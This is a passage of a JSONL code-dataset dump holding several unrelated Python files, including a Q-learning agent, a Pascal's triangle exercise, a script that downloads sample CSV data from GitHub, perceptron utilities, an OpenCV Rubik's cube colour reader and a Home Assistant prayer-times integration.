RecoveryMail.sudo().create(vals)","sub_path":"abandoned_cart_reminder_ept/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63656592","text":"import sys\nsys.path.append('../implementations/')\n\nfrom implementations.foods import foods\n\nprint('List of foods: {}'.format(foods))\n\nmy_foods = foods[:-2]\nfriend_foods = foods[0:2]\n\nprint('My food: {}'.format(my_foods))\nprint('My friend foods: {}'.format(friend_foods))","sub_path":"content_d_using_lists/ex29_copying_list.py","file_name":"ex29_copying_list.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35694360","text":"from Action import Action\nfrom Gridworld import GridWorld\n\nimport numpy as np\n\nclass Agent:\n\n def __init__(self, state_dims, num_actions, lr=1e-2, epsilon=0, gamma=1, decay_lr = 0.99, decay_epsilon=0.75, supervisor=False):\n # state_dims is a list of dim sizes for each dim of\n # the state\n self.num_indices = len(state_dims)\n self.dim_sizes = state_dims\n # useful for index calculation\n self.cum_mult = np.array([np.prod(state_dims[i+1:]) for i in range(self.num_indices)])\n\n total_state_dim = np.prod(state_dims)\n # self.Qtable = np.random.rand(total_state_dim, num_actions)\n self.Qtable = np.zeros((total_state_dim, num_actions))\n\n self.num_actions = num_actions\n self.lr = lr\n if epsilon == 0:\n self.epsilon = 0.5 / (num_actions - 1) #50% chance of picking best action\n else:\n self.epsilon = epsilon\n self.gamma = gamma\n self.decay_lr = decay_lr\n self.decay_epsilon = decay_epsilon\n\n self.supervisor = supervisor\n self.neginf = -100000\n return\n\n def _state_index(self, s):\n return int(np.sum(np.array(s) * self.cum_mult))\n\n # helper function to access Q table values\n def Q(self, s, a):\n a_int = int(a)\n s_index = self._state_index(s)\n return self.Qtable[s_index, a_int]\n\n # helper function to obtain best action and its Q value\n def Qmax(self,s):\n s_index = self._state_index(s)\n view = self.Qtable[s_index]\n action = np.argmax(view)\n return action, view[action]\n\n # greedy policy\n def Pi(self, s, env):\n prob_wts = [self.epsilon] * self.num_actions\n best_action, _ = self.Qmax(s)\n prob_wts[best_action] = 1 - (self.epsilon * (self.num_actions - 1))\n\n if self.supervisor:\n # Supervisor control\n s_index = self._state_index(s)\n legal, total_illegal_prob = [True]*self.num_actions, 0\n for action in range(self.num_actions):\n check_illegal = env.step(action, commit=False)\n if check_illegal:\n legal[action] = False\n total_illegal_prob += prob_wts[action]\n prob_wts[action] = 0\n self.Qtable[s_index, int(action)] = self.neginf\n\n num_legal = np.sum(legal)\n if num_legal == 0:\n # if all actions are illegal, then let the env give a huge\n # negative reward and end the trajectory\n # Any arbitrary action can be given\n return 0\n\n # redistribute probability weights\n increment = total_illegal_prob / num_legal\n for action in range(self.num_actions):\n if legal[action]:\n prob_wts[action] += increment\n\n return Action(np.random.choice(self.num_actions, p=prob_wts))\n\n # Q learning algorithm update rule\n def update(self, s, a, reward, sprime, done):\n # done - bool\n done = int(done)\n s_index = self._state_index(s)\n sprime_index = self._state_index(sprime)\n a_int = int(a)\n delta = reward + (1-done) * (self.gamma * self.Qmax(sprime)[1] - self.Q(s,a))\n self.Qtable[s_index, a_int] += self.lr * delta\n return\n\n def decay(self):\n self.epsilon = self.decay_epsilon * self.epsilon\n self.lr = self.decay_lr * self.lr\n return\n","sub_path":"src/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"306136669","text":"\"\"\"\n Given an integer rowIndex, return the rowIndexth row of the Pascal's triangle.\n Notice that the row index starts from 0.\n Could you optimize your algorithm to use only O(k) extra space?\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n # recursive solution\n if rowIndex == 0:\n return [1]\n lastRow = self.getRow(rowIndex - 1)\n res = [1]\n for i in range(len(lastRow) - 1):\n res.append(lastRow[i] + lastRow[i + 1])\n res.append(1)\n return res\n\n def getRow2(self, rowIndex: int) -> List[int]:\n \n mydict = { 0:[1], 1:[1,1] }\n if rowIndex in mydict:\n return mydict[rowIndex]\n \n def addToDict(n):\n if n in mydict:\n return\n else:\n tmp=[]\n tmp.append(1)\n i=0\n previous = mydict[n-1]\n while i+1 < n-1:\n tmp.append( previous[i]+previous[i+1] )\n i += 1\n tmp.append(1)\n #print('tmp=', tmp)\n mydict[n] = tmp\n return\n\n for i in range(1, rowIndex+2):\n addToDict(i)\n #print('checking mydict = ', mydict)\n \n \n return mydict[rowIndex+1]","sub_path":"LeetCode_exercises/ex0119_pascalsTriangleII.py","file_name":"ex0119_pascalsTriangleII.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"498399794","text":"# @author Kai (Frank) Zhang (zhangk2019@seu.edu.cn)\r\n# @time 2021/5/20 9:40\r\n# @desc [script description]\r\n\r\n\r\n#!/usr/bin/python\r\n# coding:utf-8\r\n\r\nimport requests\r\nimport io\r\nimport pandas as pd\r\nimport csv\r\nimport os\r\nimport threading\r\nimport shutil\r\n\r\n\r\ndef _download_url(url, filename, loc_dir):\r\n try:\r\n import requests\r\n except ImportError:\r\n print('please print requests to preceed downloading!!')\r\n\r\n try:\r\n r = requests.get(url)\r\n r.raise_for_status()\r\n with open(loc_dir+filename, 'wb') as f:\r\n f.write(r.content)\r\n except requests.HTTPError:\r\n print('file not existing: '+url)\r\n except requests.ConnectionError:\r\n raise Exception(\r\n 'check your connectcion!!! Then, if the input data exists, copy the data from local system')\r\n if(os.path.exists(\"./testdata\")):\r\n filePath = os.path.join('./testdata/')\r\n currentPath = os.path.join('./')\r\n shutil.copy(filePath+'node.csv', currentPath)\r\n shutil.copy(filePath+'link.csv', currentPath)\r\n shutil.copy(filePath+'trace.csv', currentPath)\r\n except Exception as e:\r\n raise e\r\n\r\n\r\ndef first_way():\r\n # raw.githubusercontent.com/username/repo-name/branch-name/path\r\n url = 'https://raw.githubusercontent.com/xiaomo123zk/MapMatching4GMNS-0.2.14/master/MapMatching4GMNS/'\r\n\r\n data_sets = [\r\n \"testdata\"\r\n ]\r\n\r\n files = [\r\n \"node.csv\",\r\n \"link.csv\",\r\n \"trace.csv\"\r\n ]\r\n\r\n print('downloading starts')\r\n\r\n # data folder under cdw\r\n loc_data_dir = 'data'\r\n if not os.path.isdir(loc_data_dir):\r\n os.mkdir(loc_data_dir)\r\n\r\n for ds in data_sets:\r\n web_dir = url + ds + '/'\r\n loc_sub_dir = os.path.join(loc_data_dir, ds) + '/'\r\n\r\n if not os.path.isdir(loc_sub_dir):\r\n os.mkdir(loc_sub_dir)\r\n\r\n # multi-threading\r\n threads = []\r\n for x in files:\r\n t = threading.Thread(\r\n target=_download_url,\r\n args=(web_dir+x, x, loc_sub_dir)\r\n )\r\n t.start()\r\n threads.append(t)\r\n\r\n for t in threads:\r\n t.join()\r\n\r\n print('downloading completes')\r\n\r\n print('check '+os.path.join(os.getcwd(), loc_data_dir) +\r\n ' for downloaded data sets')\r\n\r\n # then, copy the input data to current path\r\n if(os.path.exists(\"./data/testdata/\")):\r\n filePath = os.path.join(\"./data/testdata/\")\r\n currentPath = os.path.join(os.getcwd())\r\n shutil.copy(filePath+'/node.csv', currentPath)\r\n shutil.copy(filePath+'/link.csv', currentPath)\r\n shutil.copy(filePath+'/trace.csv', currentPath)\r\n\r\n\r\ndef second_way():\r\n node_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/blob/master/release/node.csv'\r\n s = requests.get(node_url).content\r\n pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"node.csv\", index=True, encoding='utf-8')\r\n\r\n link_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/blob/master/release/link.csv'\r\n s = requests.get(link_url).content\r\n pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"link.csv\", index=True, encoding='utf-8')\r\n\r\n trace_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/master/release/trace.csv'\r\n s = requests.get(trace_url).content\r\n pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"trace.csv\", index=True, encoding='utf-8')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # 1, download the sample data set from GitHub,\r\n # note: if the user does not download data from the Web successfully,\r\n # please manually copy the data to the current path from \"https://github.com/xiaomo123zk/MapMatching4GMNS-0.2.14/tree/main/MapMatching4GMNS/\"\r\n\r\n first_way()\r\n\r\n # second_way()\r\n","sub_path":"tool/down_input_data_from_Github.py","file_name":"down_input_data_from_Github.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253219201","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint(np.exp((-1*2**2)))\nc=1\ndef wave_real(x,t,omega,k):\n return np.exp(-(x-t)**2)*np.cos(k*x-omega*t)\n\ndef wave_imaginary(x,t,omega,k):\n return np.exp(-(x-t)**2)*np.sin(k*x-omega*t)\n\n\nxx=np.arange(0,10,.01)\nk0=10\nk1=8\nomega0=40\nomega1=20\nfor t in np.arange(0,10,.02):\n plt.title('$t=$'+str(t))\n plt.subplot(311)\n aa=plt.plot(xx,wave_real(xx,t,omega0,k0))\n plt.ylabel('$\\\\psi$',fontsize=15)\n plt.subplot(312)\n aa=plt.plot(xx,wave_imaginary(xx,t,omega0,k0))\n plt.ylabel('$\\\\psi_*$',fontsize=15)\n plt.subplot(313)\n aa=plt.plot(xx,wave_real(xx,t,omega0,k0)**2+wave_imaginary(xx,t,omega0,k0)**2)\n# aa=plt.plot(xx,2*wave(xx,t,(omega0-omega1)/2.,(k0-k1)/2.),'r')\n# aa=plt.plot(xx,-2*wave(xx,t,(omega0-omega1)/2.,(k0-k1)/2.),'r')\n plt.ylabel('$|\\\\psi|^2$',fontsize=15)\n plt.xlabel('x')\n plt.pause(.0000001)\n\n plt.clf()\n","sub_path":"Gaussian_wave_travelling_right.py","file_name":"Gaussian_wave_travelling_right.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21679899","text":"from __future__ import division\nfrom operator import itemgetter\nimport numpy\nimport math\ndot = numpy.dot\n\n\ndef evaluate_perceptron(testing_examples, weight_vector):\n incorrect = 0\n total = 0\n act_pos = 0\n true_pos = 0\n pred_pos = 0\n for example, label in testing_examples:\n ret = dot(weight_vector, example)\n sign = -1 if ret < 0 else 1\n if sign == 1 and label == 1:\n true_pos += 1\n if sign == 1:\n pred_pos += 1\n if label == 1:\n act_pos += 1\n if sign != label:\n incorrect += 1\n\n total += 1\n if pred_pos == 0:\n p = 0\n else:\n p = true_pos / pred_pos\n if act_pos == 0:\n r = 0\n else:\n r = true_pos / act_pos\n if p == 0 and r == 0:\n fscore = 0\n else:\n fscore = 2 * p * r / (p + r)\n # print(\"f1 score: \" + str(fscore))\n # print(incorrect)\n return ((total - incorrect) / total), p, r, fscore\n\n\ndef get_feats_array(filename):\n arr = []\n with open(filename) as f:\n for l in f:\n if 'madelon' in filename:\n arr.append([1] + [int(float(x.strip())) for x in l.split(',')])\n else:\n arr.append([1] + [int(float(x.strip())) for x in l.split()])\n\n return arr\n\n\ndef get_labels_array(filename):\n arr = []\n with open(filename) as f:\n for l in f:\n arr.append(int(l.strip()))\n\n return arr\n\n\ndef build_tree_file(feats, labels, name):\n outstring = ''\n feat_lines = []\n labels_lines = []\n with open(feats) as feat:\n for l in feat:\n feat_lines.append(l.strip())\n\n with open(labels) as label:\n for l in label:\n labels_lines.append(l)\n\n with open(name, 'w') as out_file:\n for i in range(len(feat_lines)):\n out_file.write(feat_lines[i] + ',' + labels_lines[i])\n\n\ndef get_avg_threshold(example_arr):\n thresh_arr = [0] * len(example_arr[0])\n for i in range(len(example_arr)):\n for index in range(len(example_arr[i])):\n thresh_arr[index] += example_arr[i][index]\n\n return [x/len(example_arr) for x in thresh_arr]\n\n\ndef get_ig_threshold(example_arr):\n threshold_arr = [0] * (len(example_arr[0]) - 1)\n for col in range(len(example_arr[0]) - 1):\n sorted_arr = sorted(example_arr, key=itemgetter(col))\n threshold_arr[col] = get_ig_split(sorted_arr, col)\n\n return threshold_arr\n\n\ndef get_ig_split(arr, col):\n best_split = 0\n best_split_index = 0\n for row in range(len(arr)):\n split = evaluate_split(arr, row)\n if split > best_split:\n best_split = split\n best_split_index = row\n\n return arr[best_split_index][col]\n\n\ndef evaluate_split(arr, row):\n e_total = entropy(arr)\n low_split = arr[:row]\n high_split = arr[row:]\n rhs_sum = len(low_split)/len(arr) * entropy(low_split) + len(high_split)/len(arr) * entropy(high_split)\n return e_total - rhs_sum\n\n\ndef entropy(arr):\n if len(arr) == 0:\n return 0\n pos_count = 0\n for i in arr:\n if i[-1] == 1:\n pos_count += 1\n\n pos_count /= len(arr)\n neg_count = 1 - pos_count\n if pos_count == 0 and neg_count == 0:\n return 0\n if pos_count == 0:\n return -1 * neg_count * math.log2(neg_count)\n if neg_count == 0:\n return pos_count * (-1) * math.log2(pos_count)\n return pos_count * (-1) * math.log2(pos_count) - neg_count * math.log2(neg_count)\n\n\ndef process_arr(thresh_arr, example_arr):\n for i in range(len(example_arr)):\n for index in range(len(example_arr[i])):\n example_arr[i][index] = 1 if example_arr[i][index] >= thresh_arr[index] else 0\n\n return example_arr\n\n\ndef get_old_feats_arr(in_f, max_feats=124):\n arr = []\n labels = []\n f = open(in_f)\n for l in f:\n c_arr = [0] * max_feats\n c_arr[0] = 1\n ls = l.split()\n for i in range(1, len(ls)):\n item = ls[i].split(':')\n c_arr[int(item[0])] = int(item[1])\n labels.append(int(ls[0]))\n arr.append(c_arr)\n\n return arr, labels\n\n\n\n\n# build_tree_file('./data/madelon/madelon_train_processed.data', './data/madelon/madelon_train.labels', './data/madelon/tree_madelon_train_processed.data')\n# build_tree_file('./data/madelon/madelon_test_processed.data', './data/madelon/madelon_test.labels', './data/madelon/tree_madelon_test_processed.data')\n# build_tree_file('./data/handwriting/train.data', './data/handwriting/train.labels', './data/handwriting/tree_train.data')\n# build_tree_file('./data/handwriting/test.data', './data/handwriting/test.labels', './data/handwriting/tree_test.data')\n","sub_path":"cs5350/a06/svm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271071414","text":"import cv2\nimport colorsys\nimport solver\nimport serial\nimport cv2\n\n# cap = cv2.VideoCapture(0)\ngreen = [80,255,255] \nblue = [160,50,50] \nyellow = [45,255,255] \nwhite = [0,5,5] \norange = [19,100,100] \nred = [167,255,255]\nblack= [0,0,0]\n\ngreen_bgr = [0,255,0]\nblue_bgr = [255,0,0]\nred_bgr = [0,0,255]\nyellow_bgr = [0,255,255]\norange_bgr = [0,128,255]\nwhite_bgr = [255,255,255]\n\n\n\n# This function fixes the color of the pixel into the standard color\ndef colorFix(color): \n # The color of the pixel at first is in BGR \n # Now we have to convert it into HSV\n color = colorsys.rgb_to_hsv(color[2]/255, color[1]/255, color[0]/255)\n color = (color[0]*255,color[1]*255,color[2]*255)\n # print(color)\n color = list(color)\n # Depend on the color code in HSV, we classify them into 6 different color\n if(color[2]>=150) and color[1]<80 :\n # print('White')\n return white_bgr\n elif (color>[yellow[0]-15,50,50]) and color < [yellow[0]+20,255,255]:\n # print('Yellow')\n return yellow_bgr\n elif (color>[orange[0]-7,50,50]) and color < [orange[0]+10,255,255]:\n # print('Orange')\n return orange_bgr\n elif ((color<[12,255,255]) and color > [0,50,50]) or (color>[200,100,100]) and color < [255,255,255]:\n # print('Red')\n return red_bgr\n elif (color>[green[0]-20,50,50]) and color < [green[0]+40,255,255]:\n # print('Green')\n return green_bgr\n elif (color>[blue[0]-15,50,50]) and color < [blue[0]+15,255,255]:\n # print('Blue')\n return blue_bgr\n \n else:\n return black\ndef read(frame):\n#Initialize the coordinates of the scanning pixel\n c = [[]]\n X = 240\n Y = 100\n originX = (X,Y)\n originY = (X+50,Y+50)\n X1 =((originX[0]+originY[0])/2)\n Y1 = ((originX[1]+originY[1])/2)\n origin = (int (X1),int (Y1))\n\n #Take the center pixel of each square\n \n cl1 = frame[int (Y1),int (X1)]\n cl12 = frame[int (Y1)-20,int (X1)]\n cl13 = frame[int (Y1)+20,int (X1)] \n cl11=cl1\n cl1[0] = (cl11[0]/3+cl12[0]/3+cl13[0]/3)\n c1 = cl1.tolist() #Convert the tuple into a list\n c1 = colorFix(c1) #Turn the color of the pixel \n \n \n cl2 = frame[int (Y1)+100,int (X1)]\n cl22 = frame[int (Y1)+100-20,int (X1)]\n cl23 = frame[int (Y1)+100+20,int (X1)] \n cl21=cl2\n cl2[0] = (cl21[0]/3+cl22[0]/3+cl23[0]/3)\n c2 = cl2.tolist()\n c2 = colorFix(c2)\n \n cl3 = frame[int (Y1)+200,int (X1)]\n cl32 = frame[int (Y1)+200-20,int (X1)]\n cl33 = frame[int (Y1)+200+20,int (X1)] \n cl31=cl3\n cl3[0] = (cl31[0]/3+cl32[0]/3+cl33[0]/3)\n c3 = cl3.tolist()\n c3 = colorFix(c3)\n \n cl4= frame[int (Y1),int (X1) +100]\n cl42 = frame[int (Y1)-20,int (X1)+100] \n cl43 = frame[int (Y1)+20,int (X1)+100] \n cl41=cl4\n cl4[0] = (cl41[0]/3+cl42[0]/3+cl43[0]/3)\n c4 = cl4.tolist()\n c4 = colorFix(c4)\n \n cl5 = frame[int (Y1)+100,int (X1)+100]\n cl52 = frame[int (Y1)+100-20,int (X1)+100]\n cl53 = frame[int (Y1)+100+20,int (X1)+100] \n cl51=cl5\n cl5[0] = (cl51[0]/3+cl52[0]/3+cl53[0]/3)\n c5 = cl5.tolist()\n c5 = colorFix(c5)\n \n cl6 = frame[int (Y1)+200,int (X1)+100]\n cl62 = frame[int (Y1)+200-20,int (X1)+100]\n cl63 = frame[int (Y1)+200+20,int (X1)+100] \n cl61=cl6\n cl6[0] = (cl61[0]/3+cl62[0]/3+cl63[0]/3)\n c6 = cl6.tolist()\n c6 = colorFix(c6)\n \n cl7 = frame[int (Y1),int (X1)+200]\n cl72 = frame[int (Y1)-20,int (X1)+200]\n cl73 = frame[int (Y1)+20,int (X1)+200] \n cl71=cl7\n cl7[0] = (cl71[0]/3+cl72[0]/3+cl73[0]/3)\n c7 = cl7.tolist()\n c7 = colorFix(c7)\n \n cl8 = frame[int (Y1)+100,int (X1)+200]\n cl82 = frame[int (Y1)+100-20,int (X1)+200]\n cl83 = frame[int (Y1)+100+20,int (X1)+200] \n cl81=cl8\n cl8[0] = (cl81[0]/3+cl82[0]/3+cl83[0]/3)\n c8 = cl8.tolist()\n c8 = colorFix(c8)\n \n cl9 = frame[int (Y1)+200,int (X1)+200]\n cl92 = frame[int (Y1)+200-20,int (X1)+200]\n cl93 = frame[int (Y1)+200+20,int (X1)+200] \n cl91=cl9\n cl9[0] = (cl91[0]/3+cl92[0]/3+cl93[0]/3)\n c9 = cl9.tolist()\n c9 = colorFix(c9)\n \n #Draw the square and the point\n # Square 1\n cv2.rectangle(frame, originX, originY, color = c1, thickness=15, lineType=8, shift=0)\n cv2.circle(frame, origin, radius = 10, color = c1, thickness=15, lineType=8, shift=0) \n # Square 2\n cv2.rectangle(frame, (originX[0]+100,originX[1]), (originY[0]+100,originY[1]), color = c4, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]), radius = 10, color = c4, thickness=15, lineType=8, shift=0)\n # Square 3\n cv2.rectangle(frame, (originX[0]+200,originX[1]), (originY[0]+200,originY[1]), color = c7, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]), radius = 10, color = c7, thickness=15, lineType=8, shift=0)\n # Square 4\n cv2.rectangle(frame, (originX[0],originX[1]+100), (originY[0],originY[1]+100), color = c2, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0],origin[1]+100), radius = 10, color = c2, thickness=15, lineType=8, shift=0)\n # Square 5\n cv2.rectangle(frame, (originX[0]+100,originX[1]+100), (originY[0]+100,originY[1]+100), color = c5, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]+100), radius = 10, color = c5, thickness=15, lineType=8, shift=0)\n # Square 6\n cv2.rectangle(frame, (originX[0]+200,originX[1]+100), (originY[0]+200,originY[1]+100), color = c8, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]+100), radius = 10, color = c8, thickness=15, lineType=8, shift=0)\n # Square 7\n cv2.rectangle(frame, (originX[0],originX[1]+200), (originY[0],originY[1]+200), color = c3, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0],origin[1]+200), radius = 10, color = c3, thickness=15, lineType=8, shift=0)\n # Square 8\n cv2.rectangle(frame, (originX[0]+100,originX[1]+200), (originY[0]+100,originY[1]+200), color = c6, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]+200), radius = 10, color = c6, thickness=15, lineType=8, shift=0)\n # Square 9\n cv2.rectangle(frame, (originX[0]+200,originX[1]+200), (originY[0]+200,originY[1]+200), color = c9, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]+200), radius = 10, color = c9, thickness=15, lineType=8, shift=0)\n \n # Show the frame to scan\n # cv2.imshow('Frame',frame)\n s=''\n s+=check(c1)\n s+=check(c4)\n s+=check(c7)\n s+=check(c2)\n s+=check(c5)\n s+=check(c8)\n s+=check(c3)\n s+=check(c6)\n s+=check(c9) \n return s,frame\ndef check(c):\n if c == green_bgr:\n return 'G'\n if c == blue_bgr:\n return 'H'\n if c == red_bgr:\n return 'J'\n if c == orange_bgr:\n return 'O'\n if c == yellow_bgr:\n return 'Y'\n if c == white_bgr:\n return 'W'\n else:\n return'M'\n# def process():\n# while True:\n# #Turn the capture into a frame\n# s='M'*54\n# _, frame = cap.read()\n# c = read(frame)\n# k = cv2.waitKey(5) & 0xFF \n# n=0\n# k=0\n# if k == 0:\n# count = 0\n# print('Enter input mode')\n# while(count<6):\n# _, frame = cap.read()\n# c = read(frame)\n# key = cv2.waitKey(5) & 0xFF\n# print(count)\n# if key == ord(\" \"):\n# s2=''\n# s2 = s2+c\n# if s2[4]=='H':\n# s=s2[0:9] + s[9:54] \n# count+=1\n \n# elif s2[4]=='J': \n# s=s[0:9] + s2[0:9] + s[18:54]\n# count+=1\n \n# elif s2[4]=='G':\n# s=s[0:18] + s2[0:9] + s[27:54]\n# count+=1\n \n# elif s2[4]=='O':\n# s=s[0:27] + s2[0:9] + s[36:54]\n# count+=1\n \n# elif s2[4]=='Y':\n# s=s[0:36] + s2[0:9] + s[45:54]\n# count+=1\n \n# elif s2[4]=='W':\n# s=s[0:45] + s2[0:9]\n# count+=1 \n# # print(s2) \n# # print(s)\n# k=27 \n# if k == 27:\n# break \n\n# t = s\n# print(t)\n# cv2.destroyAllWindows()\n# cap.release()\n# return t","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28463217","text":"\"\"\"The islamic_prayer_times component.\"\"\"\nfrom datetime import timedelta\nimport logging\n\nfrom prayer_times_calculator import PrayerTimesCalculator, exceptions\nfrom requests.exceptions import ConnectionError as ConnError\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import Platform\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.event import async_call_later, async_track_point_in_time\nimport homeassistant.util.dt as dt_util\n\nfrom .const import CONF_CALC_METHOD, DATA_UPDATED, DEFAULT_CALC_METHOD, DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nPLATFORMS = [Platform.SENSOR]\n\nCONFIG_SCHEMA = cv.removed(DOMAIN, raise_if_present=False)\n\n\nasync def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:\n \"\"\"Set up the Islamic Prayer Component.\"\"\"\n client = IslamicPrayerClient(hass, config_entry)\n hass.data[DOMAIN] = client\n await client.async_setup()\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:\n \"\"\"Unload Islamic Prayer entry from config_entry.\"\"\"\n if hass.data[DOMAIN].event_unsub:\n hass.data[DOMAIN].event_unsub()\n hass.data.pop(DOMAIN)\n return await hass.config_entries.async_unload_platforms(config_entry, PLATFORMS)\n\n\nclass IslamicPrayerClient:\n \"\"\"Islamic Prayer Client Object.\"\"\"\n\n def __init__(self, hass, config_entry):\n \"\"\"Initialize the Islamic Prayer client.\"\"\"\n self.hass = hass\n self.config_entry = config_entry\n self.prayer_times_info = {}\n self.available = True\n self.event_unsub = None\n\n @property\n def calc_method(self):\n \"\"\"Return the calculation method.\"\"\"\n return self.config_entry.options[CONF_CALC_METHOD]\n\n def get_new_prayer_times(self):\n \"\"\"Fetch prayer times for today.\"\"\"\n calc = PrayerTimesCalculator(\n latitude=self.hass.config.latitude,\n longitude=self.hass.config.longitude,\n calculation_method=self.calc_method,\n date=str(dt_util.now().date()),\n )\n return calc.fetch_prayer_times()\n\n async def async_schedule_future_update(self):\n \"\"\"Schedule future update for sensors.\n\n Midnight is a calculated time. The specifics of the calculation\n depends on the method of the prayer time calculation. This calculated\n midnight is the time at which the time to pray the Isha prayers have\n expired.\n\n Calculated Midnight: The Islamic midnight.\n Traditional Midnight: 12:00AM\n\n Update logic for prayer times:\n\n If the Calculated Midnight is before the traditional midnight then wait\n until the traditional midnight to run the update. This way the day\n will have changed over and we don't need to do any fancy calculations.\n\n If the Calculated Midnight is after the traditional midnight, then wait\n until after the calculated Midnight. We don't want to update the prayer\n times too early or else the timings might be incorrect.\n\n Example:\n calculated midnight = 11:23PM (before traditional midnight)\n Update time: 12:00AM\n\n calculated midnight = 1:35AM (after traditional midnight)\n update time: 1:36AM.\n\n \"\"\"\n _LOGGER.debug(\"Scheduling next update for Islamic prayer times\")\n\n now = dt_util.utcnow()\n\n midnight_dt = self.prayer_times_info[\"Midnight\"]\n\n if now > dt_util.as_utc(midnight_dt):\n next_update_at = midnight_dt + timedelta(days=1, minutes=1)\n _LOGGER.debug(\n \"Midnight is after day the changes so schedule update for after\"\n \" Midnight the next day\"\n )\n else:\n _LOGGER.debug(\n \"Midnight is before the day changes so schedule update for the next\"\n \" start of day\"\n )\n next_update_at = dt_util.start_of_local_day(now + timedelta(days=1))\n\n _LOGGER.info(\"Next update scheduled for: %s\", next_update_at)\n\n self.event_unsub = async_track_point_in_time(\n self.hass, self.async_update, next_update_at\n )\n\n async def async_update(self, *_):\n \"\"\"Update sensors with new prayer times.\"\"\"\n try:\n prayer_times = await self.hass.async_add_executor_job(\n self.get_new_prayer_times\n )\n self.available = True\n except (exceptions.InvalidResponseError, ConnError):\n self.available = False\n _LOGGER.debug(\"Error retrieving prayer times\")\n async_call_later(self.hass, 60, self.async_update)\n return\n\n for prayer, time in prayer_times.items():\n self.prayer_times_info[prayer] = dt_util.parse_datetime(\n f\"{dt_util.now().date()} {time}\"\n )\n await self.async_schedule_future_update()\n\n _LOGGER.debug(\"New prayer times retrieved. Updating sensors\")\n async_dispatcher_send(self.hass, DATA_UPDATED)\n\n async def async_setup(self):\n \"\"\"Set up the Islamic prayer client.\"\"\"\n await self.async_add_options()\n\n try:\n await self.hass.async_add_executor_job(self.get_new_prayer_times)\n except (exceptions.InvalidResponseError, ConnError) as err:\n raise ConfigEntryNotReady from err\n\n await self.async_update()\n self.config_entry.add_update_listener(self.async_options_updated)\n\n await self.hass.config_entries.async_forward_entry_setups(\n self.config_entry, PLATFORMS\n )\n\n return True\n\n async def async_add_options(self):\n \"\"\"Add options for entry.\"\"\"\n if not self.config_entry.options:\n data = dict(self.config_entry.data)\n calc_method = data.pop(CONF_CALC_METHOD, DEFAULT_CALC_METHOD)\n\n self.hass.config_entries.async_update_entry(\n self.config_entry, data=data, options={CONF_CALC_METHOD: calc_method}\n )\n\n @staticmethod\n async def async_options_updated(hass: HomeAssistant, entry: ConfigEntry) -> None:\n \"\"\"Triggered by config entry options updates.\"\"\"\n if hass.data[DOMAIN].event_unsub:\n hass.data[DOMAIN].event_unsub()\n await hass.data[DOMAIN].async_update()\n","sub_path":"homeassistant/components/islamic_prayer_times/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"326550033","text":"\"\"\" A neural chatbot using sequence to sequence model with\nattentional decoder.\n\nThis is based on Google Translate Tensorflow model\nhttps://github.com/tensorflow/models/blob/master/tutorials/rnn/translate/\n\nSequence to sequence model by Cho et al.(2014)\n\nCreated by Chip Huyen as the starter code for assignment 3,\nclass CS 20SI: \"TensorFlow for Deep Learning Research\"\ncs20si.stanford.edu\n\nThis file contains the code to run the model.\n\nSee readme.md for instruction on how to run the starter code.\n\nThis implementation learns NUMBER SORTING via seq2seq. Number range: 0,1,2,3,4,5,EOS\n\nhttps://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf\n\nSee README.md to learn what this code has done!\n\nAlso SEE 